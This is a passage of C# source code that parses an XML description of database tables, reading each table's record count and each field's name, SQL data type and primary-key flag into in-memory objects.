        XmlAttribute countAttr = tableNode.Attributes["recordcount"];
        if (countAttr != null)
        {
            table.RecordCount = System.Int64.Parse(countAttr.InnerText);
        }

        foreach (XmlNode fieldNode in tableNode.SelectNodes("field"))
        {
            GlobalDS.Field field = new GlobalDS.Field();
            XmlAttribute fieldNameAttr = fieldNode.Attributes["name"];
            if (fieldNameAttr != null)
            {
                field.FieldName = fieldNameAttr.InnerText;
            }
            XmlAttribute typeAttr = fieldNode.Attributes["datatype"];
            if (typeAttr != null)
            {
                field.DataType = (System.Data.SqlDbType)System.Enum.Parse(typeof(System.Data.SqlDbType), typeAttr.InnerText);
            }
            XmlAttribute primaryAttr = fieldNode.Attributes["primary"];
            if (primaryAttr != null)
            {
                try
                {
                    field.IsPrimary = bool.Parse(primaryAttr.InnerText);
                }
                catch (System.FormatException)
                {
                    // A malformed flag is treated as "not primary".
                    field.IsPrimary = false;
                }
            }
            table.AddField(field);
        }
        parsedTables.Add(table);
    }
    _DBTables = parsedTables.ToArray();
}